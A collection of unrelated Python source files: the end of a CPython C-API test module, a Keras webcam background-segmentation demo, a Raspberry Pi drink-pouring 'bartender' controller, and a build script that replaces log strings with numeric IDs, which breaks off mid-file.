if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and test_support.verbose:
print "(%i)"%(len(l),)
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
for i in range(context.nThreads):
t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
t.start()
threads.append(t)
self.pendingcalls_wait(context.l, n, context)
for t in threads:
t.join()
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and test_support.verbose:
print "finished threads: ", nFinished
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispathced at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
def test_main():
for name in dir(_testcapi):
if name.startswith('test_'):
test = getattr(_testcapi, name)
if test_support.verbose:
print "internal", name
try:
test()
except _testcapi.error:
raise test_support.TestFailed, sys.exc_info()[1]
# some extra thread-state tests driven via _testcapi
def TestThreadState():
if test_support.verbose:
print "auto-thread-state"
idents = []
def callback():
idents.append(thread.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
if idents.count(thread.get_ident()) != 3:
raise test_support.TestFailed, \
"Couldn't find main thread correctly in the list"
if threading:
import thread
import time
TestThreadState()
t=threading.Thread(target=TestThreadState)
t.start()
t.join()
test_support.run_unittest(TestPendingCalls)
if __name__ == "__main__":
test_main()
|
live_webcam.py
|
#!/usr/bin/env python
import json
import cv2
import os
import tensorflow as tf
import time
import numpy as np
import keras
import datetime
import argparse
from keras import backend as K
from keras.models import load_model
from keras.models import model_from_json
from copy import copy
from threading import Thread
from tqdm import tqdm
"""
Demonstrates live webcam background segmentation on average CPU workstations.
"""
class FixedDropout(keras.layers.Dropout):
"""
Custom dropout layer defined in EfficientNet; the definition is needed while loading the graph
"""
def _get_noise_shape(self, inputs):
"""Noise shape for input
Args:
----
inputs(np.array)
Returns:
-------
tuple(noise): noise based on input dimesnions
"""
if self.noise_shape is None:
return self.noise_shape
symbolic_shape = keras.backend.shape(inputs)
noise_shape = [
symbolic_shape[axis] if shape is None else shape
for axis, shape in enumerate(self.noise_shape)
]
return tuple(noise_shape)
class WebStream:
"""Class to acquire webcam frames in a threaded fashion
"""
def __init__(self, src=0):
"""Initialize the webcam stream
Args:
-----
src(int or video_file_path): source to capture frames
Returns:
-------
None
"""
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
"""Start separate thread to acquire frames
Args:
-----
None
Returns:
--------
None
"""
Thread(target=self.update, args=()).start()
return self
def update(self):
"""Update the frame which is captured
Args:
-----
None
Returns:
--------
None
"""
while True:
if self.stopped:
self.stream.release()
return
(self.grabbed, self.frame) = self.stream.read()
def read(self):
"""Update the frame which is currently read
Args:
-----
None
Returns:
--------
frame(np.array): input image frame
"""
return self.frame
def stop(self):
"""Stop capturing frames from the input stream
Args:
-----
None
Returns:
--------
None
"""
self.stopped = True
class Segmentation(object):
def __init__(self, args):
self.split_h, self.split_w = (
int(args["webcam_height"]) - 150,
int(args["webcam_width"] // 2),
)
self.h, self.w, self.c = 128, 128, 3
self.threshold = 0.5
self.base_model_path = args["base_model_path"]
def load_model(self):
"""Load keras model based on path
Args:
-----
base_model_path(str): path to the frozen model
Returns:
--------
model(keras.model): model loaded with weights
"""
full_dir_path = os.path.abspath(os.path.dirname(__file__))
# load the model from graph & setup the weights
print("===============Loading Model==============")
base_model_full_path = full_dir_path + self.base_model_path
with open(base_model_full_path + "Unet_EB0_128_graph.json", "r") as f:
model_json = json.load(f)
model = model_from_json(
model_json,
custom_objects={"swish": tf.nn.swish, "FixedDropout": FixedDropout},
)
model.load_weights(base_model_full_path + "Unet_EB0_128_weights.h5")
print("===============Model loaded==============")
return model
def preprocess(self, frame):
"""Preprocess input image
Args:
-----
frame(np.array): input image
Returns:
--------
images(tuple): tuple of preprocessed images
"""
orig = cv2.resize(frame, (self.split_h, self.split_w))
orig_normal = np.divide(orig, 255, dtype=np.float32)
orig_blur = cv2.blur(
orig_normal, (int(self.split_h / 16), int(self.split_w / 16)), 0
)
image = cv2.resize(orig, (self.h, self.w), interpolation=cv2.INTER_AREA)
image = image[..., ::-1] # switch BGR to RGB
image = np.divide(image, 255, dtype=np.float32)
image = image[np.newaxis, ...]
return image, orig_normal, orig_blur
def postprocess(self, mask, orig_normal, orig_blur):
"""Preprocess input image
Args:
-----
mask(np.array): input masked image
orig_normal(np.array): input normalized image
orig_blur(np.array): input blurred image
Returns:
--------
new_image(np.array): final background segmented masked image
"""
# remove background and apply background blur for better visually appealing stream
mask_dst = cv2.resize(
mask, (self.split_h, self.split_w), interpolation=cv2.INTER_CUBIC
)
mask_dst = cv2.blur(mask_dst, (15, 15), 0)
new_image = np.multiply(orig_normal, mask_dst[:, :, None], dtype=np.float32)
mask = np.dstack((mask_dst, mask_dst, mask_dst))
new_image = np.where(mask > self.threshold, new_image, orig_blur)
return new_image
if __name__ == "__main__":
# assumes wecam resolution is 1920x1080
parser = argparse.ArgumentParser()
parser.add_argument(
"-I",
"--input-device",
type=int,
default=0,
dest="input_device",
help="Device number input",
)
parser.add_argument(
"-F",
"--full-screen",
type=int,
default=0,
dest="full_screen",
help="Full screen",
)
parser.add_argument(
"-H",
"--webcam-height",
type=int,
default=1080,
dest="webcam_height",
help="Webcam height resolution",
)
parser.add_argument(
"-W",
"--webcam-width",
type=int,
default=1920,
dest="webcam_width",
help="Webcam width resolution",
)
parser.add_argument(
"-P",
"--model_path",
type=str,
default="/./data/assets/saved_models/",
dest="base_model_path",
help="Path to frozen model",
)
args = vars(parser.parse_args())
h, w, c = 128, 128, 3
seg = Segmentation(args)
model = seg.load_model()
print("===============Warming up the graph==============")
r = np.random.rand(1, h, w, c)
for i in tqdm(range(500)):
pr_mask = model.predict(r)
print("===============Graph warmed up===============")
ws = WebStream(src=args["input_device"])
cam = ws.start()
total_time = []
frames = 0
myframe = None
try:
while True:
frame = cam.read()
myframe = copy(frame)
t1 = time.time()
# preprocess
image, orig_normal, orig_blur = seg.preprocess(myframe)
# model prediction
pr_mask = model.predict(image)
mask = pr_mask[..., 0].squeeze()
# postprocess
new_image = seg.postprocess(mask, orig_normal, orig_blur)
# display the frame
color_and_mask = np.concatenate((orig_normal, new_image), axis=1)
total_time.append(time.time() - t1)
if args["full_screen"]:
cv2.namedWindow("Segmentation", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty(
"Segmentation", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN
)
cv2.imshow("Segmentation", color_and_mask)
if cv2.waitKey(1) & 0xFF == ord("q"):
cam.stop()
cv2.destroyAllWindows()
break
frames += 1
except Exception as e:
print(e)
cam.stop()
cv2.destroyAllWindows()
print("FPS {t}".format(t=(frames / sum(total_time))))
print("Total Frames {f}".format(f=frames))
|
bartender_sh1106.py
|
from luma.core.interface.serial import i2c
from luma.core.render import canvas
from luma.oled.device import sh1106, ssd1306
from PIL import ImageFont, ImageDraw, Image
import time
import sys
import RPi.GPIO as GPIO
import json
import threading
import traceback
# from dotstar import Adafruit_DotStar
from menu import MenuItem, Menu, Back, MenuContext, MenuDelegate
from drinks import drink_list, drink_options
GPIO.setmode(GPIO.BCM)
SCREEN_WIDTH = 128
SCREEN_HEIGHT = 64
LEFT_BTN_PIN = 13
LEFT_PIN_BOUNCE = 1000
RIGHT_BTN_PIN = 5
RIGHT_PIN_BOUNCE = 2000
# OLED_RESET_PIN = 15
# OLED_DC_PIN = 16
NUMBER_NEOPIXELS = 45
NEOPIXEL_DATA_PIN = 26
NEOPIXEL_CLOCK_PIN = 6
NEOPIXEL_BRIGHTNESS = 64
FLOW_RATE = 60.0/100.0
class Bartender(MenuDelegate):
def __init__(self):
self.running = False
# set the oled screen height
self.screen_width = SCREEN_WIDTH
self.screen_height = SCREEN_HEIGHT
self.btn1Pin = LEFT_BTN_PIN
self.btn2Pin = RIGHT_BTN_PIN
# configure interrups for buttons
GPIO.setup(self.btn1Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.btn2Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# configure screen
# spi_bus = 0
# spi_device = 0
# gpio = gaugette.gpio.GPIO()
# spi = gaugette.spi.SPI(spi_bus, spi_device)
serial = i2c(port=1, address=0x3C)
device = sh1106(serial)
# Very important... This lets py-gaugette 'know' what pins to use in order to reset the display
# self.led = gaugette.ssd1306.SSD1306(gpio, spi, reset_pin=OLED_RESET_PIN, dc_pin=OLED_DC_PIN, rows=self.screen_height, cols=self.screen_width) # Change rows & cols values depending on your display dimensions.
self.led = device
self.oled_font = ImageFont.truetype('FreeSans.ttf', 12)
# self.led.begin()
# self.led.clear_display()
# self.led.display()
# self.led.invert_display()
# time.sleep(0.5)
# self.led.normal_display()
time.sleep(0.5)
# load the pump configuration from file
self.pump_configuration = Bartender.readPumpConfiguration()
for pump in self.pump_configuration.keys():
GPIO.setup(
self.pump_configuration[pump]["pin"], GPIO.OUT, initial=GPIO.HIGH)
# setup pixels:
self.numpixels = NUMBER_NEOPIXELS # Number of LEDs in strip
# Here's how to control the strip from any two GPIO pins:
datapin = NEOPIXEL_DATA_PIN
clockpin = NEOPIXEL_CLOCK_PIN
#self.strip = Adafruit_DotStar(self.numpixels, datapin, clockpin)
#self.strip.begin() # Initialize pins for output
# Limit brightness to ~1/4 duty cycle
#self.strip.setBrightness(NEOPIXEL_BRIGHTNESS)
# turn everything off
# for i in range(0, self.numpixels):
# self.strip.setPixelColor(i, 0)
# self.strip.show()
print ("Done initializing")
@staticmethod
def readPumpConfiguration():
return json.load(open('pump_config.json'))
@staticmethod
def writePumpConfiguration(configuration):
with open("pump_config.json", "w") as jsonFile:
json.dump(configuration, jsonFile)
def startInterrupts(self):
GPIO.add_event_detect(self.btn1Pin, GPIO.FALLING,
callback=self.left_btn, bouncetime=LEFT_PIN_BOUNCE)
GPIO.add_event_detect(self.btn2Pin, GPIO.FALLING,
callback=self.right_btn, bouncetime=RIGHT_PIN_BOUNCE)
def stopInterrupts(self):
GPIO.remove_event_detect(self.btn1Pin)
GPIO.remove_event_detect(self.btn2Pin)
def buildMenu(self, drink_list, drink_options):
# create a new main menu
m = Menu("Main Menu")
# add drink options
drink_opts = []
for d in drink_list:
drink_opts.append(MenuItem('drink', d["name"], {
"ingredients": d["ingredients"]}))
configuration_menu = Menu("Configure")
# add pump configuration options
pump_opts = []
for p in sorted(self.pump_configuration.keys()):
config = Menu(self.pump_configuration[p]["name"])
# add fluid options for each pump
for opt in drink_options:
# star the selected option
selected = "*" if opt["value"] == self.pump_configuration[p]["value"] else ""
config.addOption(MenuItem('pump_selection', opt["name"], {
"key": p, "value": opt["value"], "name": opt["name"]}))
# add a back button so the user can return without modifying
config.addOption(Back("Back"))
config.setParent(configuration_menu)
pump_opts.append(config)
# add pump menus to the configuration menu
configuration_menu.addOptions(pump_opts)
# add a back button to the configuration menu
configuration_menu.addOption(Back("Back"))
# adds an option that cleans all pumps to the configuration menu
configuration_menu.addOption(MenuItem('clean', 'Clean'))
configuration_menu.setParent(m)
m.addOptions(drink_opts)
m.addOption(configuration_menu)
# create a menu context
self.menuContext = MenuContext(m, self)
def filterDrinks(self, menu):
"""
Removes any drinks that can't be handled by the pump configuration
"""
for i in menu.options:
if (i.type == "drink"):
i.visible = False
ingredients = i.attributes["ingredients"]
presentIng = 0
for ing in ingredients.keys():
for p in self.pump_configuration.keys():
if (ing == self.pump_configuration[p]["value"]):
presentIng += 1
if (presentIng == len(ingredients.keys())):
i.visible = True
elif (i.type == "menu"):
self.filterDrinks(i)
def selectConfigurations(self, menu):
"""
Adds a selection star to the pump configuration option
"""
for i in menu.options:
if (i.type == "pump_selection"):
key = i.attributes["key"]
if (self.pump_configuration[key]["value"] == i.attributes["value"]):
i.name = "%s %s" % (i.attributes["name"], "*")
else:
i.name = i.attributes["name"]
elif (i.type == "menu"):
self.selectConfigurations(i)
def prepareForRender(self, menu):
self.filterDrinks(menu)
self.selectConfigurations(menu)
return True
def menuItemClicked(self, menuItem):
if (menuItem.type == "drink"):
self.makeDrink(menuItem.name, menuItem.attributes["ingredients"])
return True
elif(menuItem.type == "pump_selection"):
self.pump_configuration[menuItem.attributes["key"]
]["value"] = menuItem.attributes["value"]
Bartender.writePumpConfiguration(self.pump_configuration)
return True
elif(menuItem.type == "clean"):
self.clean()
return True
return False
def clean(self):
waitTime = 20
pumpThreads = []
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
for pump in self.pump_configuration.keys():
pump_t = threading.Thread(target=self.pour, args=(
self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(waitTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2)
# reenable interrupts
# self.startInterrupts()
self.running = False
def displayMenuItem(self, menuItem):
print(menuItem.name)
# self.led.clear_display()
# self.led.draw_text2(0,20,menuItem.name,2)
# self.led.display()
with canvas(self.led) as draw:
draw.rectangle(self.led.bounding_box, outline="white", fill="black")
draw.text((10, 10), menuItem.name,
font=self.oled_font, fill="white")
def cycleLights(self):
t = threading.currentThread()
head = 0 # Index of first 'on' pixel
tail = -10 # Index of last 'off' pixel
color = 0xFF0000 # 'On' color (starts red)
# while getattr(t, "do_run", True):
# self.strip.setPixelColor(head, color) # Turn on 'head' pixel
# self.strip.setPixelColor(tail, 0) # Turn off 'tail'
# self.strip.show() # Refresh strip
# time.sleep(1.0 / 50) # Pause 20 milliseconds (~50 fps)
# head += 1 # Advance head position
# if(head >= self.numpixels): # Off end of strip?
# head = 0 # Reset to start
# color >>= 8 # Red->green->blue->black
# if(color == 0):
# color = 0xFF0000 # If black, reset to red
# tail += 1 # Advance tail position
# if(tail >= self.numpixels):
# tail = 0 # Off end? Reset
def lightsEndingSequence(self):
# make lights green
# for i in range(0, self.numpixels):
# self.strip.setPixelColor(i, 0xFF0000)
# self.strip.show()
time.sleep(5)
# turn lights off
# for i in range(0, self.numpixels):
# self.strip.setPixelColor(i, 0)
# self.strip.show()
def pour(self, pin, waitTime):
GPIO.output(pin, GPIO.LOW)
time.sleep(waitTime)
GPIO.output(pin, GPIO.HIGH)
def progressBar(self, waitTime):
interval = waitTime / 100.0
# for x in range(1, 101):
# self.led.clear_display()
# self.updateProgressBar(x, y=35)
# self.led.display()
# time.sleep(interval)
def makeDrink(self, drink, ingredients):
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
# launch a thread to control lighting
# lightsThread = threading.Thread(target=self.cycleLights)
# lightsThread.start()
# Parse the drink ingredients and spawn threads for pumps
maxTime = 0
pumpThreads = []
for ing in ingredients.keys():
for pump in self.pump_configuration.keys():
if ing == self.pump_configuration[pump]["value"]:
waitTime = ingredients[ing] / float(self.pump_configuration[pump]["mlpersec"])
if (waitTime > maxTime):
maxTime = waitTime
pump_t = threading.Thread(target=self.pour, args=(
self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(maxTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# stop the light thread
#lightsThread.do_run = False
#lightsThread.join()
# show the ending sequence lights
# self.lightsEndingSequence()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2)
# reenable interrupts
# self.startInterrupts()
self.running = False
def left_btn(self, ctx):
if not self.running:
self.menuContext.advance()
def right_btn(self, ctx):
if not self.running:
self.menuContext.select()
def updateProgressBar(self, percent, x=15, y=15):
height = 10
width = self.screen_width-2*x
# for w in range(0, width):
# self.led.draw_pixel(w + x, y)
# self.led.draw_pixel(w + x, y + height)
# for h in range(0, height):
# self.led.draw_pixel(x, h + y)
# self.led.draw_pixel(self.screen_width-x, h + y)
# for p in range(0, percent):
# p_loc = int(p/100.0*width)
# self.led.draw_pixel(x + p_loc, h + y)
def run(self):
self.startInterrupts()
# main loop
try:
while True:
time.sleep(0.1)
except KeyboardInterrupt:
GPIO.cleanup() # clean up GPIO on CTRL+C exit
GPIO.cleanup() # clean up GPIO on normal exit
traceback.print_exc()
bartender = Bartender()
bartender.buildMenu(drink_list, drink_options)
bartender.run()
|
Pre_Build.py
|
"""
@file Pre_Build.py
@author IR
@brief This script preprocesses source files for use with Log_t
@version 0.1
@date 2020-11-11
@copyright Copyright (c) 2020
This script works by first duplicating source files to the build folder. \n
Then it scans each file for calls to a Log function and modifies them as follows. \n
If the call has a string for `LOG_TAG` parameter, give that string a unique integer ID and replace it with that integer. \n
If the ID is not a string, leave the variable alone. \n
Replace the call's `LOG_MSG` string with a unique ID as well. \n
NOTE: The `LOG_MSG` parameter must always be an inline string. \n
`LOG_TAG`s and `LOG_MSG`s do not share IDs. \n
Eg.
```
Log(ID, "My Message"); -> Log(ID, 1);
Log("My Str ID", "My Message"); -> Log(1, 1);
```
Calls to Log functions also have the option to send a number with a third parameter. \n
Eg.
```
Log("My Str ID", "My Message", 56); -> Log(1, 1, 56);
Log(ID, "My Message", A_Num_Var); -> Log(ID, 1, A_Num_Var);
```
Declarations of `LOG_TAG` also have their strings replaced with a unique ID. \n
NOTE: Definition of `LOG_TAG`s must always be an inline string. \n
Eg.
```
LOG_TAG TAG = "Logging Tag"; -> LOG_TAG TAG = 2;
```
A special case has been made to also allocate and replace string that call the following macro
```
_LogPrebuildString(x)
```
Where x is the string, it will be given a unique ID and replaced with said ID as if it were being called by a Logging function.
This is useful where one wishes to generate log functions using the C preprocessor.
Note, however, if this script is not run the macro should still allow everything to compile normally, leaving the string untouched
"""
# @cond
import shutil
import hashlib
import os
import asyncio
import threading
import time
import errno
import re
import sys
import json
import pickle
from pathlib import Path
import io
from typing import Optional, IO
import subprocess
SOURCE_NAME = "src"
LIBRARIES_NAME = "libraries"
LIB_PATH = "libraries\\Log" # Path to the implementation of Log
LIB_FILE = "LogConfig.def"
LIB_DEFINE = ("#define CONF_LOGGING_MAPPED_MODE 0", "#define CONF_LOGGING_MAPPED_MODE 1")
WORKING_DIRECTORY_OFFSET = "build\\Pre_Build\\"
# FILE_OUTPUT_PATH = "build\\bin"
FILE_OUTPUT_PATH = ""
BYPASS_SCRIPT = os.path.exists("script.disable") # bypass script if this file is found
LIMIT_TAG = 254
LIMIT_ID = 65535
BLACKLIST_ADDRESSESS = (0, 5, 9)
SOURCE_DEST_NAME = "{}{}".format(WORKING_DIRECTORY_OFFSET, SOURCE_NAME)
LIBRARIES_DEST_NAME = "{}{}".format(WORKING_DIRECTORY_OFFSET, LIBRARIES_NAME)
DATA_FILE = "{}.LogInfo".format(WORKING_DIRECTORY_OFFSET)
LOW_RAM = 4
BUF_SIZE = 65536
# PLACEHOLDER_TAG = "__PYTHON__TAG__PLACEHOLDER__{}__"
# PLACEHOLDER_ID = "__PYTHON__ID__PLACEHOLDER__{}__"
RamMemo = False
def AvailableRam():
global RamMemo
if not RamMemo:
out = subprocess.check_output("wmic OS get FreePhysicalMemory /Value", stderr=subprocess.STDOUT, shell=True)
RamMemo = round(
int(str(out).strip("b").strip("'").replace("\\r", "").replace("\\n", "").replace("FreePhysicalMemory=", "")) / 1048576, 2
)
return RamMemo
def hashFile(filePath):
if os.path.exists(filePath):
if AvailableRam() <= LOW_RAM:
sha256 = hashlib.sha256()
with open(filePath, "rb") as f:
while True:
data = f.read(BUF_SIZE)
if not data:
break
sha256.update(data)
return sha256.digest()
else:
with open(filePath, "rb") as f:
return hashlib.sha256(f.read()).hexdigest()
return ""
class Text:
@staticmethod
def error(text):
return "\033[91m\033[1m\033[4m" + text + "\033[0m"
@staticmethod
def underline(text):
return "\033[4m" + text + "\033[0m"
@staticmethod
def header(text):
return "\033[1m\033[4m" + text + "\033[0m"
@staticmethod
def warning(text):
return "\033[93m\033[1m" + text + "\033[0m"
@staticmethod
def important(text):
return "\033[94m\033[1m" + text + "\033[0m"
@staticmethod
def reallyImportant(text):
return "\033[94m\033[1m\033[4m" + text + "\033[0m"
@staticmethod
def green(text):
return "\033[92m" + text + "\033[0m"
@staticmethod
def red(text):
return "\033[91m" + text + "\033[0m"
def save_data(Object):
with open(DATA_FILE, "wb") as f:
pickle.dump(Object, f)
def load_data():
# if os.path.exists(DATA_FILE):
# with open(DATA_FILE, "rb") as f:
# return pickle.load(f)
# print("No {} found".format(DATA_FILE))
return ({}, {}, {})
def touch(rawpath):
try:
Path(rawpath).mkdir(parents=True, exist_ok=True)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
class ScriptException(Exception):
pass
class OutOfIDsException(ScriptException):
def __init__(self, message):
super().__init__(message.strip(), "Script has ran out of allocatable IDs")
class OutOfTAGsException(ScriptException):
def __init__(self, message):
super().__init__(message.strip(), "Script has ran out of allocatable TAG IDs")
class MalformedTAGDefinitionException(ScriptException):
def __init__(self, message):
super().__init__(message.strip(), "Implicit, single char or number definition of a LOG_TAG type")
class MalformedLogCallException(ScriptException):
def __init__(self, message):
super().__init__(message.strip(), "Implicit string or number inside a call to Log")
def splitErrorString(error):
if issubclass(type(error), ScriptException):
return error.args[1] + "\n\t" + error.args[0]
else:
return error
OLD_DATA = load_data() # TBI
O_TAGs = OLD_DATA[0]
O_IDs = OLD_DATA[1]
O_Files = OLD_DATA[2]
TAGs = {}
IDs = {}
Files = {}
TAG_SEM = threading.BoundedSemaphore(1)
ID_SEM = threading.BoundedSemaphore(1)
FILE_SEM = threading.BoundedSemaphore(1)
# IMPROVE: Find a better way to get unique numbers
async def getUniqueID(findDuplicate=None):
if IDs.get(findDuplicate):
return IDs[findDuplicate]
ID_SEM.acquire()
old_vals = set(O_IDs.values())
vals = set(IDs.values())
for i in range(1, LIMIT_ID):
if i not in old_vals and i not in vals:
IDs[""] = i # Claim before returning
ID_SEM.release()
return i
# Attempt to clear up some IDs
raise OutOfIDsException
async def getUniqueTAG(findDuplicate=None):
if TAGs.get(findDuplicate):
return TAGs[findDuplicate]
TAG_SEM.acquire()
old_vals = set(O_TAGs.values())
vals = set(TAGs.values())
for i in range(1, LIMIT_TAG):
if i not in BLACKLIST_ADDRESSESS and i not in old_vals and i not in vals:
TAGs[""] = i # Claim before returning
TAG_SEM.release()
return i
# Attempt to clear up some IDs
raise OutOfIDsException
FIND_SPECIAL_REGEX = (
r"_LogPrebuildString\s*\(\s*(\".*?\")\s*\)" # -> _LogPrebuildString("Str") # Special case where we can indirectly allocate a string
)
FIND_CALL_REGEX_SS = r"Log(\.[diwef])?\s*\(\s*(\".*?\")\s*,\s*(\".*?\")\s*\)\s*;" # -> Log("Str", "Str");
FIND_CALL_REGEX_VS = r"Log(\.[diwef])?\s*\(\s*([^\"]+?)\s*,\s*(\".*?\")\s*\)\s*;" # -> Log(Var, "Str");
FIND_CALL_REGEX_SSV = r"Log(\.[diwef])?\s*\(\s*(\".*?\")\s*,\s*(\".*?\")\s*,\s*([^\"]+?)\s*\)\s*;" # -> Log("Str", "Str", Var); # FIXME: SSV does not seem to be working
FIND_CALL_REGEX_VSV = r"Log(\.[diwef])?\s*\(\s*([^\"]+?)\s*,\s*(\".*?\")\s*,\s*([^\"]+?)\s*\)\s*;" # -> Log(Var, "Str", Var);
FIND_CALL_REGEX_BAD = r"(Log(?:\.[diwef])?\s*\(\s*(?:[^\"]+?|\"(?:[^\"]|\\\")*?\")\s*,\s*)([^\";]+?)(\s*(?:,\s*(?:[^\"]+?))?\s*\)\s*;)" # Implicit string or number where it should not be | IDE will warn about numbers but will still compile
FIND_TAG_DEF_REGEX_BAD = r"(LOG_TAG(?= )\s*[^\"=]+?=\s*)([^\"=]+?)(\s*;)" # Implicit or single char definition of a tag type
FIND_TAG_DEF_REGEX_GOOD = r"LOG_TAG(?= )\s*[^\"=]+?=\s*(\".*?\")\s*;"
Log_Levels = {
"": "[ LOG ] ",
".d": "[DEBUG] ",
".i": "[INFO] ",
".w": "[WARN] ",
".e": "[ERROR] ",
".f": "[FATAL] ",
}
class FileEntry: # IMPROVE: Make IDs persistent
name = ""
path = ""
rawpath = ""
workingPath = ""
offset = ""
modified = False
error = ""
def __init__(self, RawPath, FilePath, FileName, Offset):
if not os.path.exists(FilePath):
raise FileNotFoundError(FilePath)
self.name = FileName
self.path = FilePath
self.rawpath = RawPath
self.workingPath = "{}{}".format(Offset, FilePath)
self.offset = Offset
# if O_Files.get(self.workingPath):
# print("Records show {} exists".format(FileName))
touch("{}{}".format(Offset, RawPath))
async def addNewTag(self, raw_str):
string = "[{}]".format(raw_str.strip('"'))
numberID = await getUniqueTAG(string)
TAG_SEM.acquire()
TAGs[string] = numberID
TAG_SEM.release()
return numberID
async def addNewID(self, raw_log_level, raw_str):
string = Log_Levels[raw_log_level] + raw_str.strip('"')
numberID = await getUniqueID(string)
ID_SEM.acquire()
IDs[string] = numberID
ID_SEM.release()
return numberID
async def SPECIAL_STR(self, line, reMatch):
ID = await self.addNewID("", reMatch) # Special strings are always LOG for simplicity
return line.replace(reMatch, str(ID))
async def VSX(self, line, reMatch):
ID = await self.addNewID(reMatch[0], reMatch[2])
return line.replace(reMatch[2], str(ID))
async def SSX(self, line, reMatch):
TAG = await self.addNewTag(reMatch[1])
ID = await self.addNewID(reMatch[0], reMatch[2])
return line.replace(reMatch[1], str(TAG)).replace(reMatch[2], str(ID))
async def NEW_TAG(self, line, reMatch):
TAG = await self.addNewTag(reMatch)
return line.replace(reMatch, str(TAG))
async def walkLines(self, function):
tempPath = self.workingPath + ".__Lock"
lineNo = 1
newline = ""
with open(self.path, "r", encoding="utf-8") as f1, open(tempPath, "w", encoding="utf-8") as f2:
for line in f1:
try:
newline = await function(line)
f2.buffer.write(newline.encode("utf-8"))
except Exception as e: # If prev exception was about IO then oh well
self.error = "{}{}{}\n".format(
self.error,
Text.warning(" {}:{}\n".format(self.path, lineNo)),
" {}\n > {}".format(Text.red(type(e).__name__), splitErrorString(e)),
)
f2.buffer.write(line.encode("utf-8"))
finally:
lineNo += 1
self.modified = not syncFile(tempPath, "", self.rawpath, self.workingPath)
os.remove(tempPath)
async def findLogMatch(self, line):
newline = line
SPECIAL = re.findall(FIND_SPECIAL_REGEX, line)
if SPECIAL:
newline = await self.SPECIAL_STR(line, SPECIAL[0])
else:
VS = re.findall(FIND_CALL_REGEX_VS, line)
if len(VS) != 0: # ¯\_(ツ)_/¯
newline = await self.VSX(line, VS[0])
else:
TAG_GOOD = re.findall(FIND_TAG_DEF_REGEX_GOOD, line)
if TAG_GOOD:
newline = await self.NEW_TAG(line, TAG_GOOD[0])
else:
VSV = re.findall(FIND_CALL_REGEX_VSV, line)
if len(VSV) != 0:
newline = await self.VSX(line, VSV[0])
else:
TAG_BAD = re.findall(FIND_TAG_DEF_REGEX_BAD, line)
if TAG_BAD:
TAG_BAD = TAG_BAD[0]
raise MalformedTAGDefinitionException(TAG_BAD[0] + Text.error(TAG_BAD[1]) + TAG_BAD[2])
else:
BAD = re.findall(FIND_CALL_REGEX_BAD, line)
if BAD:
BAD = BAD[0]
raise MalformedLogCallException(BAD[0] + Text.error(BAD[1]) + BAD[2])
else:
SS = re.findall(FIND_CALL_REGEX_SS, line)
if len(SS) != 0:
newline = await self.SSX(line, SS[0])
else:
SSV = re.findall(FIND_CALL_REGEX_SSV, line)
if len(SSV) != 0:
newline = await self.SSX(line, SSV[0])
return newline
async def scan(self):
await self.walkLines(self.findLogMatch)
async def ingest_files(finishFunc, FilesEntries):
for File in FilesEntries[0]:
finishFunc()
await File.scan()
def run_ingest_files(finishFunc, *FilesEntries):
asyncio.run(ingest_files(finishFunc, FilesEntries))
Files = set()
FileRefs = set()
Threads = set()
FILE_CHANGE = False
def syncFile(filePath, offset, rawpath, workingFilePath=None, suppress=False):
workingFilePath = workingFilePath or "{}{}".format(offset, filePath)
global FILE_CHANGE
new = hashFile(filePath)
old = hashFile(workingFilePath)
if old == "":
old = 0
FILE_CHANGE = FILE_CHANGE and (new == old)
if not os.path.exists(workingFilePath) or new != old:
touch("{}{}".format(offset, rawpath))
shutil.copyfile(filePath, workingFilePath)
if not suppress:
print("Sync File: {} -> {}".format(filePath, offset))
return False
return True
def allocate_files(Path, Offset):
async def lib_flag(line):
return line.replace(LIB_DEFINE[0], LIB_DEFINE[1])
for subdir, _, files in os.walk(Path):
for filename in files:
filepath = subdir + os.sep + filename
rawpath = subdir + os.sep
if BYPASS_SCRIPT:
syncFile(filepath, Offset, rawpath, suppress=True)
continue
if rawpath.startswith(LIB_PATH):
libFile = FileEntry(rawpath, filepath, filename, Offset)
if libFile.name == LIB_FILE:
asyncio.run(libFile.walkLines(lib_flag))
continue
File_Ent = FileEntry(rawpath, filepath, filename, Offset)
Files.add(File_Ent)
FileRefs.add(File_Ent)
def dole_files(count, finishFunc):
while True:
file_set = set()
i = 0
while len(Files) != 0 and i != count:
file_set.add(Files.pop())
i += 1
if len(file_set) != 0: # IMPROVE: Use actual mutlithreading
# Threads.add(multiprocessing.Process(target=function, args=(file_set)))
Threads.add(threading.Thread(target=run_ingest_files, args=(finishFunc, file_set)))
if len(Files) == 0:
break
class ThreadedProgressBar:
bar_len = 10
maxcount = 0
